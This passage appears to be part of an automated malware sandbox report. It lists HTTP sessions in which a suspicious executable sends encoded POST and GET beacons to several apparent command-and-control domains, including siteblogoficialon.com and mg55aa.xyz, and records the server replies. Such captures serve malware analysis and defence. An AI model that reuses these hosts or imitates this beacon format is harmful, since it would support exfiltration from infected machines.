                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.949726203.161.55.10280692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:00.211462021 CEST526OUTGET /tb8p/?54D0m=gvohHHH0&mZytyNB=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiIsaScbSWFF5V9pamWb9U32+hQ7ii7xg== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.lacemalt.top
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:00.822619915 CEST548INHTTP/1.1 404 Not Found
                          Date: Thu, 18 Jul 2024 06:18:00 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.949727108.179.193.9880692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:06.178093910 CEST814OUTPOST /xti2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.siteblogoficialon.com
                          Origin: http://www.siteblogoficialon.com
                          Referer: http://www.siteblogoficialon.com/xti2/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 64 44 62 64 37 46 49 2b 61 42 75 49 71 45 63 63 58 58 55 52 4e 53 4f 70 57 46 47 59 36 44 6a 34 4b 72 33 6b 6d 4e 71 64 74 73 64 47 52 61 71 78 72 4c 52 76 52 4a 68 38 69 57 50 72 7a 72 39 72 48 48 4e 32 61 37 4b 65 56 47 34 47 4e 38 4a 61 46 49 4e 38 78 32 36 2b 47 52 44 37 49 6a 34 68 4d 74 4d 48 4c 5a 77 4b 5a 69 77 54 67 2b 55 46 43 2b 6d 4a 2f 67 33 70 6e 42 2b 61 54 76 6b 30 63 35 4f 6d 49 71 43 4b 46 59 47 69 2b 39 50 35 47 50 2b 33 4a 6f 6f 4c 63 36 34 62 43 63 79 6d 74 63 33 69 7a 43 45 69 79 43 30 76 2f 76 5a 7a 73 70 48 4e 7a 79 55 4b 72 44 4a 7a
                          Data Ascii: mZytyNB=dDbd7FI+aBuIqEccXXURNSOpWFGY6Dj4Kr3kmNqdtsdGRaqxrLRvRJh8iWPrzr9rHHN2a7KeVG4GN8JaFIN8x26+GRD7Ij4hMtMHLZwKZiwTg+UFC+mJ/g3pnB+aTvk0c5OmIqCKFYGi+9P5GP+3JooLc64bCcymtc3izCEiyC0v/vZzspHNzyUKrDJz
                          Jul 18, 2024 08:18:06.824328899 CEST361INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:06 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          X-Redirect-By: WordPress
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Location: https://www.siteblogoficialon.com/xti2/
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.949728108.179.193.9880692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:08.711636066 CEST838OUTPOST /xti2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.siteblogoficialon.com
                          Origin: http://www.siteblogoficialon.com
                          Referer: http://www.siteblogoficialon.com/xti2/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 64 44 62 64 37 46 49 2b 61 42 75 49 71 6c 73 63 55 30 4d 52 4c 79 4f 75 5a 6c 47 59 77 6a 69 2f 4b 72 37 6b 6d 4d 75 4e 74 61 6c 47 53 2b 6d 78 71 4a 35 76 43 35 68 38 77 32 50 75 35 4c 39 67 48 48 4a 2b 61 2b 71 65 56 47 73 47 4e 2b 52 61 46 37 56 2f 77 6d 36 34 53 68 44 35 48 44 34 68 4d 74 4d 48 4c 61 4d 67 5a 69 34 54 67 4f 6b 46 44 61 4b 4b 68 51 33 71 33 52 2b 61 58 76 6b 77 63 35 50 7a 49 72 66 43 46 61 2b 69 2b 39 2f 35 48 65 2b 30 65 59 6f 4e 57 61 35 30 47 4f 58 6f 6d 66 2f 2f 75 30 52 41 73 54 6b 39 31 75 35 74 39 62 4f 57 6d 6c 55 74 73 6b 41 62 64 49 6e 34 46 66 54 4a 52 75 64 41 6b 70 32 39 6c 43 70 6c 70 77 3d 3d
                          Data Ascii: mZytyNB=dDbd7FI+aBuIqlscU0MRLyOuZlGYwji/Kr7kmMuNtalGS+mxqJ5vC5h8w2Pu5L9gHHJ+a+qeVGsGN+RaF7V/wm64ShD5HD4hMtMHLaMgZi4TgOkFDaKKhQ3q3R+aXvkwc5PzIrfCFa+i+9/5He+0eYoNWa50GOXomf//u0RAsTk91u5t9bOWmlUtskAbdIn4FfTJRudAkp29lCplpw==
                          Jul 18, 2024 08:18:09.324654102 CEST361INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:09 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          X-Redirect-By: WordPress
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Location: https://www.siteblogoficialon.com/xti2/
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.949729108.179.193.9880692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:11.248905897 CEST1851OUTPOST /xti2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.siteblogoficialon.com
                          Origin: http://www.siteblogoficialon.com
                          Referer: http://www.siteblogoficialon.com/xti2/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 64 44 62 64 37 46 49 2b 61 42 75 49 71 6c 73 63 55 30 4d 52 4c 79 4f 75 5a 6c 47 59 77 6a 69 2f 4b 72 37 6b 6d 4d 75 4e 74 61 74 47 52 4c 36 78 72 75 6c 76 42 35 68 38 7a 32 50 76 35 4c 39 39 48 48 78 36 61 2b 75 4f 56 46 55 47 4f 62 46 61 48 4b 56 2f 35 6d 36 34 51 68 44 34 49 6a 35 70 4d 72 73 62 4c 5a 30 67 5a 69 34 54 67 49 41 46 4b 75 6d 4b 6a 51 33 70 6e 42 2b 6f 54 76 6b 59 63 39 61 45 49 72 71 67 46 70 32 69 2b 5a 62 35 4c 49 71 30 43 49 6f 50 56 61 35 73 47 4f 72 6a 6d 62 6e 5a 75 30 4d 6e 73 55 6f 39 33 59 30 71 6d 72 4f 73 6c 32 42 52 6d 6e 6b 75 51 64 4c 69 4e 2f 32 64 41 64 4a 62 31 61 54 4b 76 7a 41 6f 30 4e 55 73 55 54 70 61 7a 79 52 52 4e 59 62 4c 69 4b 4e 67 35 51 41 62 6f 31 43 5a 38 62 58 54 68 57 4a 36 4f 54 37 56 6b 41 6b 70 30 63 4e 43 6d 50 69 30 57 4c 70 2b 4c 43 4d 52 42 2f 52 6b 4e 49 48 6a 6e 62 2b 4d 57 66 30 74 66 34 30 4a 36 53 32 30 4a 69 44 49 4f 69 53 74 4b 48 6b 56 37 66 46 49 37 76 4b 36 7a 2b 48 31 35 33 4c 44 6c 4b 55 77 39 53 44 5a 32 55 [TRUNCATED]
                          Data Ascii: mZytyNB=dDbd7FI+aBuIqlscU0MRLyOuZlGYwji/Kr7kmMuNtatGRL6xrulvB5h8z2Pv5L99HHx6a+uOVFUGObFaHKV/5m64QhD4Ij5pMrsbLZ0gZi4TgIAFKumKjQ3pnB+oTvkYc9aEIrqgFp2i+Zb5LIq0CIoPVa5sGOrjmbnZu0MnsUo93Y0qmrOsl2BRmnkuQdLiN/2dAdJb1aTKvzAo0NUsUTpazyRRNYbLiKNg5QAbo1CZ8bXThWJ6OT7VkAkp0cNCmPi0WLp+LCMRB/RkNIHjnb+MWf0tf40J6S20JiDIOiStKHkV7fFI7vK6z+H153LDlKUw9SDZ2UrUY47XxhshADmT6/Jt1OiT6eacGktSEq0IS9hkckxwM5xSLspJcggFxxYtJWO2xD0+YLDXLM2EzehOy7IrC5xzELfTSXCO6ATW0kF1NU628FTB14VLDXvK2igqXKCRjRw+/GSlMFQdexjnA68gY6d3/slisLapBoAI0fUL7Fzy/uOeG80aUWbpy83v/lXk6peq5c9K4n5ewz9J2U6T5GZh1iMl118UK08b2m5YZzLt8kYPlXah5nQgGCQhb90iEIkoVEqxq4tJnQ3jfREw0wziCXvSSzNFDX1J/nis47RFxZ0bVMEfHiLWxK6PWXvVzyTv4s2OIoxHiaiX+tvdTR2oTmuwhsvLRBgup2uBlJCDNX5Jdkj6U1Y84Su+1CvGvY0PRpPlOlTkfzhEU+IRdDOLwqBuCxSAms+ReS/xFGzccxCC8XXX1he0ye/ypaIAD98LldgXptkd2pTuFviQNHioVBn1xiI7/XCcTApfZZdEMaPbrnfa22/w3VH8VCKNdc8Y5Hznjrjxhy3hJmdymO2KEcz99mQcjT56m1Dk3dElp+2fXlwe7BXEpC5NxKEEeDc333XPEmAL+GJM6dKZxkbfFpF/Ll0iaenHRHV+wAjI1nHSOj9nlMOng7RyqI25Ry5+1WhkOWl9IN9tfFESI81I0ZoRaWw3b7kp [TRUNCATED]
                          Jul 18, 2024 08:18:11.881146908 CEST361INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:11 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          X-Redirect-By: WordPress
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Location: https://www.siteblogoficialon.com/xti2/
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.949730108.179.193.9880692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:13.794574976 CEST535OUTGET /xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2pFGuXFTeP1snGKodOakbcCZ5ieg/dQ==&54D0m=gvohHHH0 HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.siteblogoficialon.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:14.452423096 CEST501INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:14 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          X-Redirect-By: WordPress
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Location: https://www.siteblogoficialon.com/xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2pFGuXFTeP1snGKodOakbcCZ5ieg/dQ==&54D0m=gvohHHH0
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.94973135.241.34.21680692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:36.102586031 CEST781OUTPOST /7npk/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mg55aa.xyz
                          Origin: http://www.mg55aa.xyz
                          Referer: http://www.mg55aa.xyz/7npk/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 36 6e 4a 46 42 55 6e 39 4e 65 33 4f 32 6c 63 31 37 7a 79 50 34 55 5a 66 67 68 59 64 56 38 51 4c 45 54 61 71 65 35 67 48 61 51 4b 52 54 6d 73 76 37 5a 35 32 38 6f 31 39 33 67 4a 53 43 45 56 6d 6b 6f 4c 5a 2f 77 68 55 41 32 49 65 6a 6c 42 61 35 70 49 69 46 59 7a 62 68 45 42 2f 35 72 53 66 51 67 44 4f 5a 56 6c 66 68 35 6f 39 69 6e 42 45 77 4e 30 38 30 7a 6e 52 6e 45 4e 53 69 52 45 59 78 77 30 52 53 6f 5a 59 51 41 6f 36 42 43 74 58 45 2f 59 38 4d 43 47 4c 69 6c 70 42 56 74 38 6e 6c 57 69 5a 47 73 75 74 6c 6e 69 58 42 30 76 4a 33 43 69 32 66 39 51 49 41 4b 4b 2b
                          Data Ascii: mZytyNB=6nJFBUn9Ne3O2lc17zyP4UZfghYdV8QLETaqe5gHaQKRTmsv7Z528o193gJSCEVmkoLZ/whUA2IejlBa5pIiFYzbhEB/5rSfQgDOZVlfh5o9inBEwN080znRnENSiREYxw0RSoZYQAo6BCtXE/Y8MCGLilpBVt8nlWiZGsutlniXB0vJ3Ci2f9QIAKK+
                          Jul 18, 2024 08:18:36.734452963 CEST176INHTTP/1.1 405 Method Not Allowed
                          Server: nginx/1.20.2
                          Date: Thu, 18 Jul 2024 06:18:36 GMT
                          Content-Type: text/html
                          Content-Length: 157
                          Via: 1.1 google
                          Connection: close
                          Jul 18, 2024 08:18:36.737665892 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.94973235.241.34.21680692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:38.635194063 CEST805OUTPOST /7npk/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mg55aa.xyz
                          Origin: http://www.mg55aa.xyz
                          Referer: http://www.mg55aa.xyz/7npk/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 36 6e 4a 46 42 55 6e 39 4e 65 33 4f 33 46 4d 31 35 55 75 50 36 30 5a 63 6c 68 59 64 50 4d 51 50 45 54 65 71 65 38 5a 59 5a 69 2b 52 55 43 6f 76 36 59 35 32 39 6f 31 39 39 41 4a 74 66 55 56 39 6b 6f 58 72 2f 30 68 55 41 32 63 65 6a 67 39 61 35 61 77 68 45 49 7a 56 36 55 42 35 6b 37 53 66 51 67 44 4f 5a 56 78 35 68 34 41 39 6a 58 52 45 33 5a 41 2f 2b 54 6e 4f 75 6b 4e 53 6d 52 45 63 78 77 30 76 53 70 46 32 51 43 67 36 42 48 52 58 45 72 30 6a 47 43 47 4e 2f 31 6f 41 51 74 70 52 70 46 71 36 50 61 75 58 78 46 71 2f 43 56 50 58 6d 77 72 74 4b 71 51 76 48 74 44 57 62 62 6e 78 51 79 76 63 73 6a 48 44 75 63 44 70 62 59 35 48 52 77 3d 3d
                          Data Ascii: mZytyNB=6nJFBUn9Ne3O3FM15UuP60ZclhYdPMQPETeqe8ZYZi+RUCov6Y529o199AJtfUV9koXr/0hUA2cejg9a5awhEIzV6UB5k7SfQgDOZVx5h4A9jXRE3ZA/+TnOukNSmREcxw0vSpF2QCg6BHRXEr0jGCGN/1oAQtpRpFq6PauXxFq/CVPXmwrtKqQvHtDWbbnxQyvcsjHDucDpbY5HRw==
                          Jul 18, 2024 08:18:39.267457962 CEST176INHTTP/1.1 405 Method Not Allowed
                          Server: nginx/1.20.2
                          Date: Thu, 18 Jul 2024 06:18:39 GMT
                          Content-Type: text/html
                          Content-Length: 157
                          Via: 1.1 google
                          Connection: close
                          Jul 18, 2024 08:18:39.270921946 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.94973335.241.34.21680692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:41.163125038 CEST1818OUTPOST /7npk/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mg55aa.xyz
                          Origin: http://www.mg55aa.xyz
                          Referer: http://www.mg55aa.xyz/7npk/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 36 6e 4a 46 42 55 6e 39 4e 65 33 4f 33 46 4d 31 35 55 75 50 36 30 5a 63 6c 68 59 64 50 4d 51 50 45 54 65 71 65 38 5a 59 5a 69 6d 52 54 78 67 76 37 37 68 32 76 34 31 39 6a 51 4a 73 66 55 55 6e 6b 6f 66 56 2f 31 63 68 41 79 73 65 67 47 70 61 6f 62 77 68 4f 49 7a 56 6c 45 42 38 35 72 53 4f 51 67 54 77 5a 56 68 35 68 34 41 39 6a 52 39 45 68 64 30 2f 74 44 6e 52 6e 45 4e 4f 69 52 45 34 78 77 73 5a 53 70 42 49 51 7a 41 36 42 6d 68 58 43 59 4d 6a 46 69 47 50 38 31 70 54 51 74 31 43 70 42 79 4d 50 61 79 39 78 48 71 2f 54 54 69 57 79 69 65 79 4a 4c 6b 6c 4a 2f 76 43 44 2f 6a 74 63 7a 75 5a 36 41 62 5a 75 5a 47 72 58 4c 41 66 46 75 52 63 4f 65 57 4e 6e 74 70 6f 44 53 79 54 36 35 56 74 33 36 50 53 71 6f 6c 54 53 4d 49 76 41 45 56 50 63 47 2f 4f 6a 73 2f 31 6c 43 62 64 41 4d 44 47 31 75 36 32 79 65 4b 50 35 4f 2b 4b 4b 52 70 2f 62 4c 42 75 41 64 79 61 72 52 52 73 71 6b 64 67 66 72 34 38 6c 42 73 36 68 45 43 4c 41 30 56 72 36 76 2b 7a 51 61 7a 30 70 54 69 74 5a 54 64 69 63 78 41 79 69 46 [TRUNCATED]
                          Data Ascii: mZytyNB=6nJFBUn9Ne3O3FM15UuP60ZclhYdPMQPETeqe8ZYZimRTxgv77h2v419jQJsfUUnkofV/1chAysegGpaobwhOIzVlEB85rSOQgTwZVh5h4A9jR9Ehd0/tDnRnENOiRE4xwsZSpBIQzA6BmhXCYMjFiGP81pTQt1CpByMPay9xHq/TTiWyieyJLklJ/vCD/jtczuZ6AbZuZGrXLAfFuRcOeWNntpoDSyT65Vt36PSqolTSMIvAEVPcG/Ojs/1lCbdAMDG1u62yeKP5O+KKRp/bLBuAdyarRRsqkdgfr48lBs6hECLA0Vr6v+zQaz0pTitZTdicxAyiFaVxPv/T12QB7MK3ZTWRyM01clXqlQ9pHnsxxBv9DNDVfh0cfbnDk+57NNKEA4AXpeljY1AsRHeGsqWTOvytNPWCmPm7VgPe2WHlJUIwFvZqa4ypUqOA9OCuaqoM3FeHS0zt4DpVG7ZJ7Q66ITHaqWA1dkz5tp+4ATKhQl6zNGA15TtBB5o5GHMuHgIQDRXD40UEADAfde0pDwICyacdADgEgx2/+dbFAu/glb0ZkhD0iIC2XktP8kgGBsX54fmhG/Sq1PCXP0iEC4H+US8Xk7j3E12iRszSg5zs/qV7C5QMBPFzVRXYjC20BKT0x5VkZ44bO40obSd7HripoxVA1ctcMK913bHpdRMbvalyHYzhDenNtI6ApogT4KeskGO02FqgPeXbiD4orJeNLkfxm/lm048ENJguj2fuJKTXL+giVKexvLhx0ql0Rq3SsPdbCct8HQvkItGAJlqPr2H3MiaE/mw/9HIQYxQIqCxJMXX+RpI/i9q3xi+PPonLW6Hlt/Wy5qwrnlHSqtjVjcj/CaawOZpOLxVS4QUteccbifqhsdmoVq4FzWASQ9O83joZC68Xza7DCB4m3LkzICtPJQMrOJ5SY14n/dvo/HXF26Kfcoygvebo4q1JoBbkSdJIppy1UNl0QN0lbAIOgYjD0bhlP15B442sNcG [TRUNCATED]
                          Jul 18, 2024 08:18:41.797302008 CEST176INHTTP/1.1 405 Method Not Allowed
                          Server: nginx/1.20.2
                          Date: Thu, 18 Jul 2024 06:18:41 GMT
                          Content-Type: text/html
                          Content-Length: 157
                          Via: 1.1 google
                          Connection: close
                          Jul 18, 2024 08:18:41.800997019 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


